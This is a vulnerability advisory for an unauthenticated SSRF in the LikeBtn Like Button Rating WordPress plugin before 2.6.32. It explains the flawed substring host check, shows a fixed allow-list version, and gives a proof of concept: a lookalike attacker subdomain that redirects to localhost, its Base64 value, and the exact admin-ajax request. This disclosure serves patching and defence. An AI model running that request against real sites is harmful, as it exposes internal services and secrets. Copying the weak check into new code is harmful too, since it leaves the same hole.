Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF

Description

The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).

On line 7493 of likebtn_like_button.php a hook is registered that allows unauthenticated AJAX calls to reach the function likebtn_prx(). As the name suggests, this function works as a proxy and makes the server issue a request to a user-specified URL, provided the host is likebtn.com. The URL to request is passed in the GET parameter likebtn_q as a Base64-encoded value. To ensure that the host is likebtn.com, the following host check is performed:

if (!strstr(parse_url($url, PHP_URL_HOST), 'likebtn.com')) {
    $response['err'] = 'Wrong prx address';
} else {
    ...
}

As you might notice, this host check fails rather miserably. As long as the string "likebtn.com" appears somewhere in the host, the URL is accepted. This means that, e.g., the following host would be accepted:

likebtn.com.attackerwebsite.bla

A GET request is then sent to the specified URL using WP_Http::request. Since redirects are followed, an attacker can easily make the server request whatever they want. Finally, the response body is dumped to the caller with echo, as seen on lines 7400-7409.
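To make the gap concrete, here is an added example (not the plugin's code; the allow-list, the helper names and the request-argument set are assumptions) that evaluates the substring check quoted above and a strict allow-list check against the bypass host from this advisory, and builds a WP_Http argument set that refuses to follow the redirect on which the proof of concept below relies:

```php
<?php
// Added example, not the plugin's own code. The allow-list, the helper names
// and the request-argument set are assumptions made for illustration.

// The substring check from the advisory: any host that merely contains
// "likebtn.com" passes, including likebtn.com.attackerwebsite.bla.
function likebtn_host_check_vulnerable(string $url): bool {
    $host = (string) parse_url($url, PHP_URL_HOST);
    return strstr($host, 'likebtn.com') !== false;
}

// Strict replacement: http/https only, no userinfo or explicit port, and the
// host must be an exact, case-insensitive match against the allow-list.
function likebtn_host_check_strict(string $url, array $allowed = ['likebtn.com', 'www.likebtn.com']): bool {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return false;
    }
    return in_array(strtolower($parts['host']), $allowed, true);
}

// Arguments for WP_Http::request() / wp_remote_get() that close the redirect
// hole: 'redirection' => 0 stops Location headers from being followed, and
// 'reject_unsafe_urls' => true runs wp_http_validate_url(), which refuses
// loopback and private-range hosts.
function likebtn_prx_request_args(): array {
    return [
        'method'             => 'GET',
        'timeout'            => 5,
        'redirection'        => 0,
        'reject_unsafe_urls' => true,
    ];
}

// Constructed sample URLs, including the bypass host from the advisory.
foreach (['https://likebtn.com/api', 'http://likebtn.com.attackerwebsite.bla/', 'http://likebtn.com:8080/'] as $url) {
    printf("%-42s vulnerable=%s strict=%s\n", $url,
        var_export(likebtn_host_check_vulnerable($url), true),
        var_export(likebtn_host_check_strict($url), true));
}
```

The bypass host passes the vulnerable check and fails the strict one; the explicit-port URL shows that even a correct host name is worth rejecting when the proxy only ever needs the standard ports.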

Proof of Concept

Let's say that an attacker owns the website attackerwebsite.bla and wants to attack targetwebsite.bla which uses the LikeBtn WP plugin. The attacker would then do the following:

1. Create the subdomain likebtn.com.attackerwebsite.bla
2. Make the subdomain redirect to localhost
3. Base64 encode the URL to the new subdomain (http://likebtn.com.attackerwebsite.bla -> aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=)
4. Make a request to https://targetwebsite.bla/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=
5. The attacker then receives all the juicy secret info stored on localhost

Affects Plugins

Like Button Rating, fixed in 2.6.32

Classification

Type: SSRF

Miscellaneous

Original Researcher: Lauritz Holme
Submitter: Holme
Verified: No

Timeline

Publicly Published: 2021-02-06
Added: 2021-02-06
Last Updated: 2021-02-07